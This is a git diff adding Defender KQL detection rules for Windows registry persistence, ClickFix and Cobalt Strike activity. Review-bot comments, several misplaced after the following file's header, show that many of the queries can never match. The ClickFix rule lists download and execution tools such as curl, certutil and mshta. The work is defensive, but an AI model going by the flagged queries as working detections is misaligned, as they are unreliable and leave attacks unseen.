+| where (RegistryKey endswith "\\System\\CurrentControlSet\\Control\\WMI\\Autologger*" and (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\EventLog-" or RegistryKey contains "\\Defender") and (RegistryKey endswith "\\Enable" or RegistryKey endswith "\\Start"))) and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\") and (RegistryKey endswith "\\DefenderApiLogger*" or RegistryKey endswith "\\DefenderAuditLogger*")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql b/KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql
new file mode 100644
index 00000000..6c856384
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql
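Review bot: `RegistryKey endswith "\\System\\CurrentControlSet\\Control\\WMI\\Autologger*"` cannot coexist with `RegistryKey endswith "\\Enable"` / `"\\Start"`, since KQL `endswith` has no wildcard, so this high-severity detection never fires; it should be `RegistryKey contains "\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\"`. `RegistryValueData =~ "DWORD (0x00000000)"` likewise needs MDE's decimal `"0"`. The Defender exclusion's `endswith "\\DefenderApiLogger*"` / `"\\DefenderAuditLogger*"` terms have the same literal-`*` defect, so once the main clause is fixed MsMpEng's own writes will alert until those become `contains`.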
@@ -0,0 +1,15 @@
+// Title: Potential ClickFix Execution Pattern - Registry
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-03-25
+// Level: high
+// Description: Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.
+// ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.
+// Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,
+// such as one-liners that execute remotely hosted malicious files or scripts.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.001
+// False Positives:
+// - Legitimate applications using RunMRU with HTTP links
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "http://" or RegistryValueData contains "https://") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*" and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identification" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "finger" or RegistryValueData contains "mshta" or RegistryValueData 
contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript")) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/potential_cobaltstrike_service_installations_registry.kql b/KQL/rules/windows/registry/registry_set/potential_cobaltstrike_service_installations_registry.kql new file mode 100644 index 00000000..6a2951a5 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/potential_cobaltstrike_service_installations_registry.kql @@ -0,0 +1,12 @@ +// Title: Potential CobaltStrike Service Installations - Registry +// Author: Wojciech Lesicki +// Date: 2021-06-29 +// Level: high +// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1543.003, attack.t1569.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services")) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql b/KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql new file mode 100644 index 00000000..6f67d5b6 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql 
@@ -0,0 +1,12 @@
+// Title: Potential COM Object Hijacking Via TreatAs Subkey - Registry
+// Author: Kutepov Anton, oscd.community
+// Date: 2019-10-23
+// Level: medium
+// Description: Detects COM object hijacking via TreatAs subkey
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+// - Maybe some system utilities in rare cases use linking keys for backward compatibility
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*" and RegistryKey contains "\\TreatAs") and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql b/KQL/rules/windows/registry/registry_set/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
new file mode 100644
index 00000000..c5d6b1af
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
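Review bot: `RegistryKey endswith "HKU*"` is a prefix test that the converter turned into a suffix test with a literal `*`; together with `endswith "Classes\\CLSID*"` the conjunction can never hold, so the rule is inert. The intended logic is `RegistryKey startswith "HKU" and RegistryKey contains "Classes\\CLSID\\" and RegistryKey contains "\\TreatAs"`. Note also that DeviceRegistryEvents spells the hive as `HKEY_USERS`/`HKEY_CURRENT_USER` rather than the Sysmon-style `HKU`, so the prefix should be checked against a real row — `RegistryKey startswith "HKEY_USERS\\"` is likely what is needed here.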
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Attempt Using New NetworkProvider - REG
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-23
+// Level: medium
+// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Other legitimate network providers used and not filtred in this rule
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\System\\CurrentControlSet\\Services*" and RegistryKey contains "\\NetworkProvider") and (not(((RegistryKey contains "\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_eventlog_file_location_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_eventlog_file_location_tampering.kql
new file mode 100644
index 00000000..451f6f29
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_eventlog_file_location_tampering.kql
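Review bot: `RegistryKey endswith "\\System\\CurrentControlSet\\Services*"` only matches a key that literally ends in `*`, so ANDed with `contains "\\NetworkProvider"` the rule never produces a row and an NPPSpy-style provider registration would go unnoticed. The converter should emit `RegistryKey contains "\\System\\CurrentControlSet\\Services\\"`. The three `contains ...\\NetworkProvider` exclusions already use the right operator and will work once the main clause is fixed.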
@@ -0,0 +1,10 @@
+// Title: Potential EventLog File Location Tampering
+// Author: D3F7A5105
+// Date: 2023-01-02
+// Level: high
+// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\File") and (not(RegistryValueData contains "\\System32\\Winevt\\Logs\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_pendingfilerenameoperations_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_pendingfilerenameoperations_tampering.kql
new file mode 100644
index 00000000..4566be91
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_pendingfilerenameoperations_tampering.kql
@@ -0,0 +1,12 @@
+// Title: Potential PendingFileRenameOperations Tampering
+// Author: frack113
+// Date: 2023-01-27
+// Level: medium
+// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Installers and updaters may set currently in use files for rename or deletion after a reboot.
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations" and ((InitiatingProcessFolderPath endswith "\\reg.exe" or InitiatingProcessFolderPath endswith "\\regedit.exe") or InitiatingProcessFolderPath contains "\\Users\\Public\\")
\ No newline at end of file
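Review bot: The two `endswith` tests on the last line are mutually exclusive (`...\\Services\\EventLog*` with a literal `*`, and `\\File`), so this high-level rule matches nothing. `File` is a value name, and DeviceRegistryEvents exposes value names in `RegistryValueName` rather than as part of `RegistryKey`, so the working filter is `RegistryKey contains "\\Services\\EventLog\\" and RegistryValueName =~ "File"`. The `not(RegistryValueData contains "\\System32\\Winevt\\Logs\\")` exclusion can stay as it is, since the data column does hold the new path.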
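Review bot: `PendingFileRenameOperations` is a value under the `Session Manager` key, and on a sensor that reports value names in `RegistryValueName` the test `RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations"` will never see a value write. Suggest `RegistryKey endswith "\\CurrentControlSet\\Control\\Session Manager" and RegistryValueName =~ "PendingFileRenameOperations"`, leaving the initiating-process clause untouched. The joined key-plus-value form is how Sysmon's `TargetObject` looks, which is presumably where the converted expression came from.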
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_using_debugpath.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_using_debugpath.kql
new file mode 100644
index 00000000..db9f023f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_using_debugpath.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Using DebugPath
+// Author: frack113
+// Date: 2022-07-27
+// Level: medium
+// Description: Detects potential persistence using Appx DebugPath
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+
+DeviceRegistryEvents
+| where (RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryKey endswith "\\DebugPath") or (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft." and RegistryKey endswith "\\(Default)")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_app_paths_default_property.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_app_paths_default_property.kql
new file mode 100644
index 00000000..f8a9409c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_app_paths_default_property.kql
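Review bot: The query has no `ActionType` restriction, so key creations and deletions under `ActivatableClasses\\Package` and `PackagedAppXDebug` raise the same alert as the value write the rule is about; add `| where ActionType == "RegistryValueSet"` (widen to `in ("RegistryValueSet", "RegistryKeyCreated")` if creation should stay in scope). `\\DebugPath` and `\\(Default)` are value names and will normally surface in `RegistryValueName` rather than as a suffix of `RegistryKey`, so those two `endswith` tests should move to that column; how the sensor names the default value is worth confirming on a real row before relying on `(Default)`.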
@@ -0,0 +1,15 @@
+// Title: Potential Persistence Via App Paths Default Property
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence
+// The entries found under App Paths are used primarily for the following purposes.
+// First, to map an application's executable file name to that file's fully qualified path.
+// Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.012
+// False Positives:
+// - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "\\Users\\Public" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-" or RegistryValueData contains "rundll32" or RegistryValueData contains "regsvr32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains ".bat" or RegistryValueData contains ".hta" or RegistryValueData contains ".dll" or RegistryValueData contains ".ps1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths" and (RegistryKey endswith "(Default)" or RegistryKey endswith "Path")
\ No newline at end of file
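Review bot: `RegistryKey endswith "(Default)" or RegistryKey endswith "Path"` at the end of the last line compares value names against the key column; in DeviceRegistryEvents those live in `RegistryValueName`, so the rule only fires if the sensor appends the value name to `RegistryKey`, which should be verified rather than assumed. A form that follows the documented schema is `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\" and RegistryValueName in~ ("", "(Default)", "Path")`, with the empty string covering a sensor that reports the default value with no name. Separately, `RegistryValueData contains "iex"` is a three-character substring that will match ordinary product or directory names; `RegistryValueData has "iex"` keeps the PowerShell alias case while cutting that noise.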
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_appcompat_registerapprestart_layer.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_appcompat_registerapprestart_layer.kql
new file mode 100644
index 00000000..6a009776
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_appcompat_registerapprestart_layer.kql
@@ -0,0 +1,14 @@
+// Title: Potential Persistence Via AppCompat RegisterAppRestart Layer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-01-01
+// Level: medium
+// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
+// This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
+// This can be potentially abused as a persistence mechanism.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+// False Positives:
+// - Legitimate applications making use of this feature for compatibility reasons
+
+DeviceRegistryEvents
+| where RegistryValueData contains "REGISTERAPPRESTART" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_autodialdll.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_autodialdll.kql
new file mode 100644
index 00000000..fb66964c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_autodialdll.kql
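Review bot: `RegistryKey endswith "...\\AppCompatFlags\\Layers*"` ends in a literal `*`, which KQL `endswith` does not expand, so the rule can never fire. Values under `Layers` are named after the program path, which makes the key itself the fixed `...\\AppCompatFlags\\Layers`; `RegistryKey endswith "\\AppCompatFlags\\Layers"` is the right test, and `RegistryValueName` then carries the executable path, which is the first thing an analyst will want to see. The `RegistryValueData contains "REGISTERAPPRESTART"` clause is fine as written.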
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via AutodialDLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_chm_helper_dll.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_chm_helper_dll.kql
new file mode 100644
index 00000000..c84b186a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_chm_helper_dll.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via CHM Helper DLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Microsoft\\HtmlHelp Author\\Location" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_custom_protocol_handler.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_custom_protocol_handler.kql
new file mode 100644
index 00000000..9b799adf
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_custom_protocol_handler.kql
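Review bot: `AutodialDLL` is a value under `WinSock2\\Parameters`, and DeviceRegistryEvents carries value names in `RegistryValueName`, so `RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL"` will not match a write to it. Suggest `RegistryKey endswith "\\Services\\WinSock2\\Parameters" and RegistryValueName =~ "AutodialDLL"`. Since the rule is level high with no exclusions, projecting `RegistryValueData` and `InitiatingProcessFolderPath` would put the DLL path and the writer in front of the analyst immediately.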
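Review bot: The query fires on any event whose key path contains `HtmlHelp Author\\Location`, including key creation and deletion, while the description speaks of modification; add `| where ActionType == "RegistryValueSet"` so only writes alert. `Location` is a value name and is likely to appear in `RegistryValueName` rather than at the end of `RegistryKey`; if a sample row confirms that, `RegistryKey endswith "\\Microsoft\\HtmlHelp Author" and RegistryValueName =~ "Location"` replaces both `contains` branches, since the `endswith` covers the native and `WOW6432Node` paths alike.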
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Custom Protocol Handler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-30
+// Level: medium
+// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.
+
+DeviceRegistryEvents
+| where (RegistryValueData startswith "URL:" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES*") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or RegistryValueData startswith "URL:ms-")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_dllpathoverride.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_dllpathoverride.kql
new file mode 100644
index 00000000..47c8c3f1
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_dllpathoverride.kql
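Review bot: `RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES*"` is an exact case-insensitive equality and the `*` is a literal character, so no row ever satisfies it and the rule is dead. The intent is a prefix test; with the `HKEY_LOCAL_MACHINE` naming used here the classes root is under `SOFTWARE\\Classes`, so `RegistryKey startswith "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\"` is the replacement (confirm the exact rendering on a real row). `InitiatingProcessFolderPath startswith "C:\\Program Files (x86)"` is also missing the trailing backslash its sibling `"C:\\Program Files\\"` has, so a directory such as `C:\\Program Files (x86)evil` would be excluded too; add the `\\`.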
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via DLLPathOverride
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language*" and (RegistryKey contains "\\StemmerDLLPathOverride" or RegistryKey contains "\\WBDLLPathOverride" or RegistryKey contains "\\StemmerClass" or RegistryKey contains "\\WBreakerClass")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_event_viewer_events_asp.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_event_viewer_events_asp.kql
new file mode 100644
index 00000000..05844b1f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_event_viewer_events_asp.kql
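Review bot: `RegistryKey endswith "...\\ContentIndex\\Language*"` carries a literal `*`, so the first conjunct is never true and this high-level rule cannot fire; `RegistryKey contains "\\CurrentControlSet\\Control\\ContentIndex\\Language\\"` expresses the intended prefix. The four names in the second group are values (the description itself calls `DLLPathOverride` a value), so once the key test is fixed they belong in `RegistryValueName in~ ("StemmerDLLPathOverride", "WBDLLPathOverride", "StemmerClass", "WBreakerClass")` rather than being searched for inside `RegistryKey`.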
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Event Viewer Events.asp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-17
+// Level: medium
+// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_excel_add_in_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_excel_add_in_registry.kql
new file mode 100644
index 00000000..c76d6bf9
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_excel_add_in_registry.kql
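Review bot: The exclusion list on the last line is written against Sysmon's rendering of registry data and will not apply here: `RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s"` uses `*` as a wildcard inside an exact `=~` comparison, and `%%SystemRoot%%` is Sysmon's doubled-percent escape, which a sensor that reports `%SystemRoot%` unescaped (confirm on a sample row) never produces. Drop the doubling and replace that `=~` with `RegistryValueData startswith "-url hcp://services/centers/support" and RegistryValueData endswith "topic=%s"`. `MicrosoftRedirectionProgram` and `MicrosoftRedirectionURL` are value names and will normally be in `RegistryValueName`, not at the end of `RegistryKey`, so the positive match needs the same rework before the exclusions matter at all.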
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Excel Add-in - Registry
+// Author: frack113
+// Date: 2023-01-15
+// Level: high
+// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.006
+
+DeviceRegistryEvents
+| where RegistryValueData endswith ".xll" and RegistryValueData startswith "/R " and RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Options"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_globalflags.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_globalflags.kql
new file mode 100644
index 00000000..eda54125
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_globalflags.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via GlobalFlags
+// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
+// Date: 2018-04-11
+// Level: high
+// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1546.012, car.2013-01-002
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\Image File Execution Options*" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\SilentProcessExit*"))
\ No newline at end of file
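Review bot: `RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Options"` cannot both hold, and the `*` is a literal character, so this high-level rule is dead on arrival. Replace the first test with `RegistryKey contains "\\Software\\Microsoft\\Office\\"` and keep the `\\Excel\\Options` suffix for the key. The `RegistryValueData startswith "/R " and RegistryValueData endswith ".xll"` pair is what actually identifies the add-in registration and can stay as is.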
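Review bot: Both branches AND two `endswith` tests that end in literal asterisks (`\\CurrentVersion*` with `\\Image File Execution Options*`, and again with `\\SilentProcessExit*`); the suffixes are mutually exclusive, so neither branch ever matches. `GlobalFlag`, `ReportingMode` and `MonitorProcess` are values, so a working shape is `RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" and RegistryValueName =~ "GlobalFlag"` for the first branch and `RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\" and RegistryValueName in~ ("ReportingMode", "MonitorProcess")` for the second. Whether the sensor places value names in `RegistryValueName` should be verified on a sample row before the change lands.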
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql
new file mode 100644
index 00000000..8f2365a3
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Logon Scripts - Registry
+// Author: Tom Ueltschi (@c_APT_ure)
+// Date: 2019-01-12
+// Level: medium
+// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence, attack.lateral-movement
+// False Positives:
+// - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate
+
+DeviceRegistryEvents
+| where RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_lsa_extensions.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_lsa_extensions.kql
new file mode 100644
index 00000000..b86ff662
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_lsa_extensions.kql
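Review bot: `RegistryKey contains "UserInitMprLogonScript"` searches the key column for what the description itself calls a value; on a sensor that reports value names separately in `RegistryValueName` this never matches. `RegistryValueName =~ "UserInitMprLogonScript"`, optionally anchored with `RegistryKey endswith "\\Environment"` where the value normally lives, is the equivalent test. With that change `RegistryValueData` holds the script path the false-positive note asks the analyst to inspect, so projecting it would help triage.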
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via LSA Extensions
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
+// The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_mpnotify.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mpnotify.kql
new file mode 100644
index 00000000..f6314db4
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mpnotify.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Mpnotify
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
+// MITRE Tactic: Persistence
